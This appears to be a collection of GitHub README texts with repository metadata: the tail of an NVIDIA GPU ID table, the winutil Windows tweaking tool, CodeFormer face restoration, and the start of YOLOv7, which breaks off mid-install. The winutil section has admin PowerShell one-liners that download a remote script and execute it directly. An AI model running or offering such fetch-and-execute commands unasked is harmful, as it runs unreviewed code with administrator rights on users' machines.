RTX 3070 Ti | 2207 | | NVIDIA GeForce RTX 3080 Ti | 2208 | | NVIDIA GeForce RTX 3080 | 220A | | NVIDIA CMP 90HX | 220D | | NVIDIA GeForce RTX 3080 | 2216 | | NVIDIA RTX A6000 | 2230 1028 1459 | | NVIDIA RTX A6000 | 2230 103C 1459 | | NVIDIA RTX A6000 | 2230 10DE 1459 | | NVIDIA RTX A6000 | 2230 17AA 1459 | | NVIDIA RTX A5000 | 2231 1028 147E | | NVIDIA RTX A5000 | 2231 103C 147E | | NVIDIA RTX A5000 | 2231 10DE 147E | | NVIDIA RTX A5000 | 2231 17AA 147E | | NVIDIA RTX A4500 | 2232 1028 163C | | NVIDIA RTX A4500 | 2232 103C 163C | | NVIDIA RTX A4500 | 2232 10DE 163C | | NVIDIA RTX A4500 | 2232 17AA 163C | | NVIDIA RTX A5500 | 2233 1028 165A | | NVIDIA RTX A5500 | 2233 103C 165A | | NVIDIA RTX A5500 | 2233 10DE 165A | | NVIDIA RTX A5500 | 2233 17AA 165A | | NVIDIA A40 | 2235 10DE 145A | | NVIDIA A10 | 2236 10DE 1482 | | NVIDIA A10G | 2237 10DE 152F | | NVIDIA A10M | 2238 10DE 1677 | | NVIDIA H100 NVL | 2321 10DE 1839 | | NVIDIA H800 PCIe | 2322 10DE 17A4 | | NVIDIA H800 | 2324 10DE 17A6 | | NVIDIA H800 | 2324 10DE 17A8 | | NVIDIA H20 | 2329 10DE 198B | | NVIDIA H20 | 2329 10DE 198C | | NVIDIA H100 80GB HBM3 | 2330 10DE 16C0 | | NVIDIA H100 80GB HBM3 | 2330 10DE 16C1 | | NVIDIA H100 PCIe | 2331 10DE 1626 | | NVIDIA H200 | 2335 10DE 18BE | | NVIDIA H200 | 2335 10DE 18BF | | NVIDIA H100 | 2339 10DE 17FC | | NVIDIA H800 NVL | 233A 10DE 183A | | NVIDIA GH200 120GB | 2342 10DE 16EB | | NVIDIA GH200 120GB | 2342 10DE 1805 | | NVIDIA GH200 480GB | 2342 10DE 1809 | | NVIDIA GeForce RTX 3060 Ti | 2414 | | NVIDIA GeForce RTX 3080 Ti Laptop GPU | 2420 | | NVIDIA RTX A5500 Laptop GPU | 2438 | | NVIDIA GeForce RTX 3080 Ti Laptop GPU | 2460 | | NVIDIA GeForce RTX 3070 Ti | 2482 | | NVIDIA GeForce RTX 3070 | 2484 | | NVIDIA GeForce RTX 3060 Ti | 2486 | | NVIDIA GeForce RTX 3060 | 2487 | | NVIDIA GeForce RTX 3070 | 2488 | | NVIDIA GeForce RTX 3060 Ti | 2489 | | NVIDIA CMP 70HX | 248A | | NVIDIA GeForce RTX 3080 Laptop GPU | 249C | | NVIDIA GeForce RTX 3060 Laptop GPU | 249C 1D05 1194 | | NVIDIA GeForce RTX 3070 Laptop GPU | 249D | | NVIDIA GeForce RTX 3070 Ti Laptop GPU | 24A0 | | NVIDIA GeForce RTX 3060 Laptop GPU | 24A0 1D05 1192 | | NVIDIA RTX A4000 | 24B0 1028 14AD | | NVIDIA RTX A4000 | 24B0 103C 14AD | | NVIDIA RTX A4000 | 24B0 10DE 14AD | | NVIDIA RTX A4000 | 24B0 17AA 14AD | | NVIDIA RTX A4000H | 24B1 10DE 1658 | | NVIDIA RTX A5000 Laptop GPU | 24B6 | | NVIDIA RTX A4000 Laptop GPU | 24B7 | | NVIDIA RTX A3000 Laptop GPU | 24B8 | | NVIDIA RTX A3000 12GB Laptop GPU | 24B9 | | NVIDIA RTX A4500 Laptop GPU | 24BA | | NVIDIA RTX A3000 12GB Laptop GPU | 24BB | | NVIDIA GeForce RTX 3060 | 24C7 | | NVIDIA GeForce RTX 3060 Ti | 24C9 | | NVIDIA GeForce RTX 3080 Laptop GPU | 24DC | | NVIDIA GeForce RTX 3070 Laptop GPU | 24DD | | NVIDIA GeForce RTX 3070 Ti Laptop GPU | 24E0 | | NVIDIA RTX A4500 Embedded GPU | 24FA | | NVIDIA GeForce RTX 3060 | 2503 | | NVIDIA GeForce RTX 3060 | 2504 | | NVIDIA GeForce RTX 3050 | 2507 | | NVIDIA GeForce RTX 3050 OEM | 2508 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2520 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2521 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 2523 | | NVIDIA RTX A2000 | 2531 1028 151D | | NVIDIA RTX A2000 | 2531 103C 151D | | NVIDIA RTX A2000 | 2531 10DE 151D | | NVIDIA RTX A2000 | 2531 17AA 151D | | NVIDIA GeForce RTX 3060 | 2544 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2560 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 2563 | | NVIDIA RTX A2000 12GB | 2571 1028 1611 | | NVIDIA RTX A2000 12GB | 2571 103C 1611 | | NVIDIA RTX A2000 12GB | 2571 10DE 1611 | | NVIDIA RTX A2000 12GB | 2571 17AA 1611 | | NVIDIA GeForce RTX 3050 | 2582 | | NVIDIA GeForce RTX 3050 | 2584 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25A0 | | NVIDIA GeForce RTX 3050Ti Laptop GPU | 25A0 103C 8928 | | NVIDIA GeForce RTX 3050Ti Laptop GPU | 25A0 103C 89F9 | | NVIDIA GeForce RTX 3060 Laptop GPU | 25A0 1D05 1196 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25A2 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25A2 1028 0BAF | | NVIDIA GeForce RTX 3060 Laptop GPU | 25A2 1D05 1195 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25A5 | | NVIDIA GeForce MX570 | 25A6 | | NVIDIA GeForce RTX 2050 | 25A7 | | NVIDIA GeForce RTX 2050 | 25A9 | | NVIDIA GeForce MX570 A | 25AA | | NVIDIA GeForce RTX 3050 4GB Laptop GPU | 25AB | | NVIDIA GeForce RTX 3050 6GB Laptop GPU | 25AC | | NVIDIA GeForce RTX 2050 | 25AD | | NVIDIA RTX A1000 | 25B0 1028 1878 | | NVIDIA RTX A1000 | 25B0 103C 1878 | | NVIDIA RTX A1000 | 25B0 10DE 1878 | | NVIDIA RTX A1000 | 25B0 17AA 1878 | | NVIDIA RTX A400 | 25B2 1028 1879 | | NVIDIA RTX A400 | 25B2 103C 1879 | | NVIDIA RTX A400 | 25B2 10DE 1879 | | NVIDIA RTX A400 | 25B2 17AA 1879 | | NVIDIA A16 | 25B6 10DE 14A9 | | NVIDIA A2 | 25B6 10DE 157E | | NVIDIA RTX A2000 Laptop GPU | 25B8 | | NVIDIA RTX A1000 Laptop GPU | 25B9 | | NVIDIA RTX A2000 8GB Laptop GPU | 25BA | | NVIDIA RTX A500 Laptop GPU | 25BB | | NVIDIA RTX A1000 6GB Laptop GPU | 25BC | | NVIDIA RTX A500 Laptop GPU | 25BD | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25E0 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25E2 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25E5 | | NVIDIA GeForce RTX 3050 6GB Laptop GPU | 25EC | | NVIDIA GeForce RTX 2050 | 25ED | | NVIDIA RTX A1000 Embedded GPU | 25F9 | | NVIDIA RTX A2000 Embedded GPU | 25FA | | NVIDIA RTX A500 Embedded GPU | 25FB | | NVIDIA GeForce RTX 4090 | 2684 | | NVIDIA GeForce RTX 4090 D | 2685 | | NVIDIA RTX 6000 Ada Generation | 26B1 1028 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 103C 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 10DE 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 17AA 16A1 | | NVIDIA RTX 5000 Ada Generation | 26B2 1028 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 103C 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 10DE 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 17AA 17FA | | NVIDIA RTX 5880 Ada Generation | 26B3 1028 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 103C 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 10DE 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 17AA 1934 | | NVIDIA L40 | 26B5 10DE 169D | | NVIDIA L40 | 26B5 10DE 17DA | | NVIDIA L40S | 26B9 10DE 1851 | | NVIDIA L40S | 26B9 10DE 18CF | | NVIDIA L20 | 26BA 10DE 1957 | | NVIDIA L20 | 26BA 10DE 1990 | | NVIDIA GeForce RTX 4080 SUPER | 2702 | | NVIDIA GeForce RTX 4080 | 2704 | | NVIDIA GeForce RTX 4070 Ti SUPER | 2705 | | NVIDIA GeForce RTX 4070 | 2709 | | NVIDIA GeForce RTX 4090 Laptop GPU | 2717 | | NVIDIA RTX 5000 Ada Generation Laptop GPU | 2730 | | NVIDIA GeForce RTX 4090 Laptop GPU | 2757 | | NVIDIA RTX 5000 Ada Generation Embedded GPU | 2770 | | NVIDIA GeForce RTX 4070 Ti | 2782 | | NVIDIA GeForce RTX 4070 SUPER | 2783 | | NVIDIA GeForce RTX 4070 | 2786 | | NVIDIA GeForce RTX 4060 Ti | 2788 | | NVIDIA GeForce RTX 4080 Laptop GPU | 27A0 | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 1028 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 103C 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 10DE 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 17AA 16FA | | NVIDIA RTX 4500 Ada Generation | 27B1 1028 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 103C 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 10DE 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 17AA 180C | | NVIDIA RTX 4000 Ada Generation | 27B2 1028 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 103C 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 10DE 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 17AA 181B | | NVIDIA L2 | 27B6 10DE 1933 | | NVIDIA L4 | 27B8 10DE 16CA | | NVIDIA L4 | 27B8 10DE 16EE | | NVIDIA RTX 4000 Ada Generation Laptop GPU | 27BA | | NVIDIA RTX 3500 Ada Generation Laptop GPU | 27BB | | NVIDIA GeForce RTX 4080 Laptop GPU | 27E0 | | NVIDIA RTX 3500 Ada Generation Embedded GPU | 27FB | | NVIDIA GeForce RTX 4060 Ti | 2803 | | NVIDIA GeForce RTX 4060 Ti | 2805 | | NVIDIA GeForce RTX 4060 | 2808 | | NVIDIA GeForce RTX 4070 Laptop GPU | 2820 | | NVIDIA RTX 3000 Ada Generation Laptop GPU | 2838 | | NVIDIA GeForce RTX 4070 Laptop GPU | 2860 | | NVIDIA GeForce RTX 4060 | 2882 | | NVIDIA GeForce RTX 4060 Laptop GPU | 28A0 | | NVIDIA GeForce RTX 4050 Laptop GPU | 28A1 | | NVIDIA RTX 2000 Ada Generation | 28B0 1028 1870 | | NVIDIA RTX 2000 Ada Generation | 28B0 103C 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 103C 1871 | | NVIDIA RTX 2000 Ada Generation | 28B0 10DE 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 10DE 1871 | | NVIDIA RTX 2000 Ada Generation | 28B0 17AA 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 17AA 1871 | | NVIDIA RTX 2000 Ada Generation Laptop GPU | 28B8 | | NVIDIA RTX 1000 Ada Generation Laptop GPU | 28B9 | | NVIDIA RTX 500 Ada Generation Laptop GPU | 28BA | | NVIDIA RTX 500 Ada Generation Laptop GPU | 28BB | | NVIDIA GeForce RTX 4060 Laptop GPU | 28E0 | | NVIDIA GeForce RTX 4050 Laptop GPU | 28E1 | | NVIDIA RTX 2000 Ada Generation Embedded GPU | 28F8 |
NVIDIA Linux open GPU kernel module source
null
96
30
144
59
126
15
0
ChrisTitusTech/winutil
# Chris Titus Tech's Windows Utility This utility is a compilation of Windows tasks I perform on each Windows system I use. It is meant to streamline *installs*, debloat with *tweaks*, troubleshoot with *config*, and fix Windows *updates*. I am extremely picky about any contributions to keep this project clean and efficient. ![screen-install](screen-install.png) ## Usage Winutil must be run in Admin mode because it performs system-wide tweaks. To achieve this, open PowerShell or Windows Terminal as an administrator. Here are a few ways to do it: 1. **Right-Click Method:** - Right-click on the start menu. - Choose "Windows PowerShell (Admin)" (for Windows 10) or "Terminal (Admin)" (for Windows 11). 2. **Search and Launch Method:** - Press the Windows key. - Type "PowerShell" or "Terminal" (for Windows 11). - Press `Ctrl + Shift + Enter` to launch it with administrator privileges. ### Launch Command #### Simple way ``` irm https://christitus.com/win | iex ``` Courtesy of the issue raised at: [#144](/../../issues/144) or by executing: ``` iwr -useb https://christitus.com/win | iex ``` if for some reason this site is not reachable from your country please try running it directly from github (replace `RELEASE_TAG` with current release that you are interested in, for example `v2024.06.05`) ``` irm "https://github.com/ChrisTitusTech/winutil/releases/download/RELEASE_TAG/winutil.ps1" | iex ``` #### Automation Some features are avaliable through automation. This allows you to save your config file pass it to Winutil walk away and come back to a finished system. Here is how you can set it up currently with Winutil >24.01.15 1. On the Install Tab, click "Get Installed", this will get all installed apps **supported by Winutil** on the system ![GetInstalled](/wiki/Get-Installed.png) 2. Click on the Settings cog in the upper right corner and chose Export, chose file file and location, this will export the setting file. ![SettingsExport](/wiki/Settings-Export.png) 3. Copy this file to a USB or somewhere you can use after Windows installation. 4. Use Microwin tab to create a custom Windows image. 5. Install the Windows image. 6. In the new Windows, Open PowerShell in the admin mode and run command to automatically apply tweaks and install apps from the config file. ``` iex "& { $(irm christitus.com/win) } -Config [path-to-your-config] -Run" ``` 7. Have a cup of coffee! Come back when it's done. ## Issues: - If you are unable to resolve christitus.com/win and are getting errors launching the tool, it might be due to India blocking GitHub's content domain and preventing downloads. You may use a VPN or change your DNS provider to Google/Cloudflare/etc. Source: <https://timesofindia.indiatimes.com/gadgets-news/github-content-domain-blocked-for-these-indian-users-reports/articleshow/96687992.cms> - Windows Security (formerly Defender) and other anti-virus software are known to block the script. The script gets flagged due to the fact that it requires administrator privileges & makes drastic system changes. - If you are having TLS 1.2 issues, or are having trouble resolving `christitus.com/win` then run with the following command: ``` [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ChrisTitusTech/winutil/main/winutil.ps1') ``` If you are still having issues try changing your DNS provider to 1.1.1.1 || 1.0.0.1 or 8.8.8.8 || 8.8.4.4 ## Support - To morally and mentally support the project, make sure to leave a โญ๏ธ! - EXE Wrapper for $10 @ https://www.cttstore.com/windows-toolbox ## Tutorial [![Watch the video](https://img.youtube.com/vi/6UQZ5oQg8XA/hqdefault.jpg)](https://www.youtube.com/watch?v=6UQZ5oQg8XA) ## Overview - Install - Install Selection: Organize programs by category and facilitate installation by enabling users to select programs and initiate the installation process with a single click. - Upgrade All: Upgrade all existing programs to their latest versions, ensuring users have the most up-to-date and feature-rich software. - Uninstall Selection: Effortlessly uninstall selected programs, providing users with a streamlined way to remove unwanted software from their system. - Get Installed: Retrieve a comprehensive list of installed programs on the system, offering users visibility into the software currently installed on their computer. - Import / Export: Enable users to import or export the selection list of programs, allowing them to save their preferred program configurations or share them with others. This feature promotes convenience and flexibility in managing program selections across different systems. - Tweaks - Recommended Selection: Provides pre-defined templates tailored for desktop, laptop, and minimal configurations, allowing users to select recommended settings and optimizations specific to their system type. - Essential Tweaks: Offers a collection of essential tweaks aimed at improving system performance, privacy, and resource utilization. These tweaks include creating a system restore point, disabling telemetry, Wi-Fi Sense, setting services to manual, disabling location tracking, and HomeGroup, among others. - Advanced Tweaks: Encompasses a range of various advanced power user tweaks to further optimize the system. These tweaks include removing OneDrive and Edge, disabling User Account Control (UAC), notification panel, among others. - Toggles: Adds easy to use, one click shortcuts for toggling dark mode, NumLock on startup, file extensions, sticky keys, among others. - Additional Tweaks: Introduces various other tweaks such as enabling dark mode, changing DNS settings, adding an Ultimate Performance mode, and creating shortcuts for WinUtil tools. These tweaks provide users with additional customization options to tailor their system to their preferences. - Config - Features: Allows users to easily install various essential components and features to enhance their Windows experience. These features include installing .NET Frameworks, enabling Hyper-V virtualization, enabling legacy media support for Windows Media Player and DirectPlay, enabling NFS (Network File System) for network file sharing, and enabling Windows Subsystem for Linux (WSL) for running Linux applications on Windows. - Fixes: Provides a range of helpful fixes to address common issues and improve system stability. This includes setting up autologon for seamless login experiences, resetting Windows updates to resolve update-related problems, performing a system corruption scan to detect and repair corrupted files, and resetting network settings to troubleshoot network connectivity issues. - Legacy Windows Panels: Includes access to legacy Windows panels from Windows 7, allowing users to access familiar and powerful tools. These panels include Control Panel for managing system settings, Network Connections for configuring network adapters and connections, Power Panel for adjusting power and sleep settings, Sound Settings for managing audio devices and settings, System Properties for viewing and modifying system information, and User Accounts for managing user profiles and account settings. - Updates: - Default (Out of Box) Settings: Provides the default settings that come with Windows for updates. - Security (Recommended) Settings: Offers recommended settings, including a slight delay of feature updates by 2 years and installation of security updates 4 days after release. - Disable All Updates (Not Recommended!): Allows users to disable all Windows updates, but it's not recommended due to potential security risks. Video and Written Article walkthrough @ <https://christitus.com/windows-tool/> ## Issues If you encounter any challenges or problems with the script, I kindly request that you submit them via the "Issues" tab on the GitHub repository. By filling out the provided template, you can provide specific details about the issue, allowing me to promptly address any bugs or consider feature requests. ## Contribute Code Pull Requests are now handled directly on the MAIN branch. This was done since we can now select specific releases to launch via releases in GitHub. If doing a code change and you can submit a PR to main branch, but I am very selective about these. Do not use a code formatter, massive amounts of line changes, and make multiple feature changes. EACH FEATURE CHANGE SHOULD BE IT'S OWN Pull Request! When creating pull requests, it is essential to thoroughly document all changes made. This includes documenting any additions made to the tweaks section and ensuring that corresponding undo measures are in place to remove the newly added tweaks if necessary. Failure to adhere to this format may result in denial of the pull request. Additionally, comprehensive documentation is required for all code changes. Any code lacking sufficient documentation may also be denied. By following these guidelines, we can maintain a high standard of quality and ensure that the codebase remains organized and well-documented. NOTE: When creating a function please include "WPF" or "WinUtil" in the name so that it can be loaded into the runspace. ## Thanks to all Contributors Thanks a lot for spending your time helping Winutil grow. Thanks a lot! Keep rocking ๐Ÿป. [![Contributors](https://contrib.rocks/image?repo=ChrisTitusTech/winutil)](https://github.com/ChrisTitusTech/winutil/graphs/contributors) ## GitHub Stats ![Alt](https://repobeats.axiom.co/api/embed/aad37eec9114c507f109d34ff8d38a59adc9503f.svg "Repobeats analytics image")
Chris Titus Tech's Windows Utility - Install Programs, Tweaks, Fixes, and Updates
null
5
150
763
250
58
1
4
sczhou/CodeFormer
<p align="center"> <img src="assets/CodeFormer_logo.png" height=110> </p> ## Towards Robust Blind Face Restoration with Codebook Lookup Transformer (NeurIPS 2022) [Paper](https://arxiv.org/abs/2206.11253) | [Project Page](https://shangchenzhou.com/projects/CodeFormer/) | [Video](https://youtu.be/d3VDpkXlueI) <a href="https://colab.research.google.com/drive/1m52PNveE4PBhYrecj34cnpEeiHcC5LTb?usp=sharing"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="google colab logo"></a> [![Hugging Face](https://img.shields.io/badge/Demo-%F0%9F%A4%97%20Hugging%20Face-blue)](https://huggingface.co/spaces/sczhou/CodeFormer) [![Replicate](https://img.shields.io/badge/Demo-%F0%9F%9A%80%20Replicate-blue)](https://replicate.com/sczhou/codeformer) [![OpenXLab](https://img.shields.io/badge/Demo-%F0%9F%90%BC%20OpenXLab-blue)](https://openxlab.org.cn/apps/detail/ShangchenZhou/CodeFormer) ![Visitors](https://api.infinitescript.com/badgen/count?name=sczhou/CodeFormer&ltext=Visitors) [Shangchen Zhou](https://shangchenzhou.com/), [Kelvin C.K. Chan](https://ckkelvinchan.github.io/), [Chongyi Li](https://li-chongyi.github.io/), [Chen Change Loy](https://www.mmlab-ntu.com/person/ccloy/) S-Lab, Nanyang Technological University <img src="assets/network.jpg" width="800px"/> :star: If CodeFormer is helpful to your images or projects, please help star this repo. Thanks! :hugs: ### Update - **2023.07.20**: Integrated to :panda_face: [OpenXLab](https://openxlab.org.cn/apps). Try out online demo! [![OpenXLab](https://img.shields.io/badge/Demo-%F0%9F%90%BC%20OpenXLab-blue)](https://openxlab.org.cn/apps/detail/ShangchenZhou/CodeFormer) - **2023.04.19**: :whale: Training codes and config files are public available now. - **2023.04.09**: Add features of inpainting and colorization for cropped and aligned face images. - **2023.02.10**: Include `dlib` as a new face detector option, it produces more accurate face identity. - **2022.10.05**: Support video input `--input_path [YOUR_VIDEO.mp4]`. Try it to enhance your videos! :clapper: - **2022.09.14**: Integrated to :hugs: [Hugging Face](https://huggingface.co/spaces). Try out online demo! [![Hugging Face](https://img.shields.io/badge/Demo-%F0%9F%A4%97%20Hugging%20Face-blue)](https://huggingface.co/spaces/sczhou/CodeFormer) - **2022.09.09**: Integrated to :rocket: [Replicate](https://replicate.com/explore). Try out online demo! [![Replicate](https://img.shields.io/badge/Demo-%F0%9F%9A%80%20Replicate-blue)](https://replicate.com/sczhou/codeformer) - [**More**](docs/history_changelog.md) ### TODO - [x] Add training code and config files - [x] Add checkpoint and script for face inpainting - [x] Add checkpoint and script for face colorization - [x] ~~Add background image enhancement~~ #### :panda_face: Try Enhancing Old Photos / Fixing AI-arts [<img src="assets/imgsli_1.jpg" height="226px"/>](https://imgsli.com/MTI3NTE2) [<img src="assets/imgsli_2.jpg" height="226px"/>](https://imgsli.com/MTI3NTE1) [<img src="assets/imgsli_3.jpg" height="226px"/>](https://imgsli.com/MTI3NTIw) #### Face Restoration <img src="assets/restoration_result1.png" width="400px"/> <img src="assets/restoration_result2.png" width="400px"/> <img src="assets/restoration_result3.png" width="400px"/> <img src="assets/restoration_result4.png" width="400px"/> #### Face Color Enhancement and Restoration <img src="assets/color_enhancement_result1.png" width="400px"/> <img src="assets/color_enhancement_result2.png" width="400px"/> #### Face Inpainting <img src="assets/inpainting_result1.png" width="400px"/> <img src="assets/inpainting_result2.png" width="400px"/> ### Dependencies and Installation - Pytorch >= 1.7.1 - CUDA >= 10.1 - Other required packages in `requirements.txt` ``` # git clone this repository git clone https://github.com/sczhou/CodeFormer cd CodeFormer # create new anaconda env conda create -n codeformer python=3.8 -y conda activate codeformer # install python dependencies pip3 install -r requirements.txt python basicsr/setup.py develop conda install -c conda-forge dlib (only for face detection or cropping with dlib) ``` <!-- conda install -c conda-forge dlib --> ### Quick Inference #### Download Pre-trained Models: Download the facelib and dlib pretrained models from [[Releases](https://github.com/sczhou/CodeFormer/releases/tag/v0.1.0) | [Google Drive](https://drive.google.com/drive/folders/1b_3qwrzY_kTQh0-SnBoGBgOrJ_PLZSKm?usp=sharing) | [OneDrive](https://entuedu-my.sharepoint.com/:f:/g/personal/s200094_e_ntu_edu_sg/EvDxR7FcAbZMp_MA9ouq7aQB8XTppMb3-T0uGZ_2anI2mg?e=DXsJFo)] to the `weights/facelib` folder. You can manually download the pretrained models OR download by running the following command: ``` python scripts/download_pretrained_models.py facelib python scripts/download_pretrained_models.py dlib (only for dlib face detector) ``` Download the CodeFormer pretrained models from [[Releases](https://github.com/sczhou/CodeFormer/releases/tag/v0.1.0) | [Google Drive](https://drive.google.com/drive/folders/1CNNByjHDFt0b95q54yMVp6Ifo5iuU6QS?usp=sharing) | [OneDrive](https://entuedu-my.sharepoint.com/:f:/g/personal/s200094_e_ntu_edu_sg/EoKFj4wo8cdIn2-TY2IV6CYBhZ0pIG4kUOeHdPR_A5nlbg?e=AO8UN9)] to the `weights/CodeFormer` folder. You can manually download the pretrained models OR download by running the following command: ``` python scripts/download_pretrained_models.py CodeFormer ``` #### Prepare Testing Data: You can put the testing images in the `inputs/TestWhole` folder. If you would like to test on cropped and aligned faces, you can put them in the `inputs/cropped_faces` folder. You can get the cropped and aligned faces by running the following command: ``` # you may need to install dlib via: conda install -c conda-forge dlib python scripts/crop_align_face.py -i [input folder] -o [output folder] ``` #### Testing: [Note] If you want to compare CodeFormer in your paper, please run the following command indicating `--has_aligned` (for cropped and aligned face), as the command for the whole image will involve a process of face-background fusion that may damage hair texture on the boundary, which leads to unfair comparison. Fidelity weight *w* lays in [0, 1]. Generally, smaller *w* tends to produce a higher-quality result, while larger *w* yields a higher-fidelity result. The results will be saved in the `results` folder. ๐Ÿง‘๐Ÿป Face Restoration (cropped and aligned face) ``` # For cropped and aligned faces (512x512) python inference_codeformer.py -w 0.5 --has_aligned --input_path [image folder]|[image path] ``` :framed_picture: Whole Image Enhancement ``` # For whole image # Add '--bg_upsampler realesrgan' to enhance the background regions with Real-ESRGAN # Add '--face_upsample' to further upsample restorated face with Real-ESRGAN python inference_codeformer.py -w 0.7 --input_path [image folder]|[image path] ``` :clapper: Video Enhancement ``` # For Windows/Mac users, please install ffmpeg first conda install -c conda-forge ffmpeg ``` ``` # For video clips # Video path should end with '.mp4'|'.mov'|'.avi' python inference_codeformer.py --bg_upsampler realesrgan --face_upsample -w 1.0 --input_path [video path] ``` ๐ŸŒˆ Face Colorization (cropped and aligned face) ``` # For cropped and aligned faces (512x512) # Colorize black and white or faded photo python inference_colorization.py --input_path [image folder]|[image path] ``` ๐ŸŽจ Face Inpainting (cropped and aligned face) ``` # For cropped and aligned faces (512x512) # Inputs could be masked by white brush using an image editing app (e.g., Photoshop) # (check out the examples in inputs/masked_faces) python inference_inpainting.py --input_path [image folder]|[image path] ``` ### Training: The training commands can be found in the documents: [English](docs/train.md) **|** [็ฎ€ไฝ“ไธญๆ–‡](docs/train_CN.md). ### Citation If our work is useful for your research, please consider citing: @inproceedings{zhou2022codeformer, author = {Zhou, Shangchen and Chan, Kelvin C.K. and Li, Chongyi and Loy, Chen Change}, title = {Towards Robust Blind Face Restoration with Codebook Lookup TransFormer}, booktitle = {NeurIPS}, year = {2022} } ### License This project is licensed under <a rel="license" href="https://github.com/sczhou/CodeFormer/blob/master/LICENSE">NTU S-Lab License 1.0</a>. Redistribution and use should follow this license. ### Acknowledgement This project is based on [BasicSR](https://github.com/XPixelGroup/BasicSR). Some codes are brought from [Unleashing Transformers](https://github.com/samb-t/unleashing-transformers), [YOLOv5-face](https://github.com/deepcam-cn/yolov5-face), and [FaceXLib](https://github.com/xinntao/facexlib). We also adopt [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN) to support background image enhancement. Thanks for their awesome works. ### Contact If you have any questions, please feel free to reach me out at `shangchenzhou@gmail.com`.
[NeurIPS 2022] Towards Robust Blind Face Restoration with Codebook Lookup Transformer
codebook,codeformer,face-enhancement,face-restoration,pytorch,super-resolution,vqgan,restoration
1
3
44
71
215
1
0
WongKinYiu/yolov7
# Official YOLOv7 Implementation of paper - [YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors](https://arxiv.org/abs/2207.02696) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/yolov7-trainable-bag-of-freebies-sets-new/real-time-object-detection-on-coco)](https://paperswithcode.com/sota/real-time-object-detection-on-coco?p=yolov7-trainable-bag-of-freebies-sets-new) [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/akhaliq/yolov7) <a href="https://colab.research.google.com/gist/AlexeyAB/b769f5795e65fdab80086f6cb7940dae/yolov7detection.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> [![arxiv.org](http://img.shields.io/badge/cs.CV-arXiv%3A2207.02696-B31B1B.svg)](https://arxiv.org/abs/2207.02696) <div align="center"> <a href="./"> <img src="./figure/performance.png" width="79%"/> </a> </div> ## Web Demo - Integrated into [Huggingface Spaces ๐Ÿค—](https://huggingface.co/spaces/akhaliq/yolov7) using Gradio. Try out the Web Demo [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/akhaliq/yolov7) ## Performance MS COCO | Model | Test Size | AP<sup>test</sup> | AP<sub>50</sub><sup>test</sup> | AP<sub>75</sub><sup>test</sup> | batch 1 fps | batch 32 average time | | :-- | :-: | :-: | :-: | :-: | :-: | :-: | | [**YOLOv7**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7.pt) | 640 | **51.4%** | **69.7%** | **55.9%** | 161 *fps* | 2.8 *ms* | | [**YOLOv7-X**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x.pt) | 640 | **53.1%** | **71.2%** | **57.8%** | 114 *fps* | 4.3 *ms* | | | | | | | | | | [**YOLOv7-W6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6.pt) | 1280 | **54.9%** | **72.6%** | **60.1%** | 84 *fps* | 7.6 *ms* | | [**YOLOv7-E6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6.pt) | 1280 | **56.0%** | **73.5%** | **61.2%** | 56 *fps* | 12.3 *ms* | | [**YOLOv7-D6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6.pt) | 1280 | **56.6%** | **74.0%** | **61.8%** | 44 *fps* | 15.0 *ms* | | [**YOLOv7-E6E**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e.pt) | 1280 | **56.8%** | **74.4%** | **62.1%** | 36 *fps* | 18.7 *ms* | ## Installation Docker environment (recommended) <details><summary> <b>Expand</b> </summary> ``` shell # create the docker container, you can change the share memory size if you have more. nvidia-docker run --name yolov7 -it -v your_coco_path/:/coco/ -v your_code_path/:/yolov7 --shm-size=64g nvcr.io/nvidia/pytorch:21.08-py3 # apt install required packages apt update apt install -y zip htop screen libgl1-mesa-glx # pip install required packages pip install seaborn thop # go to code folder cd /yolov7 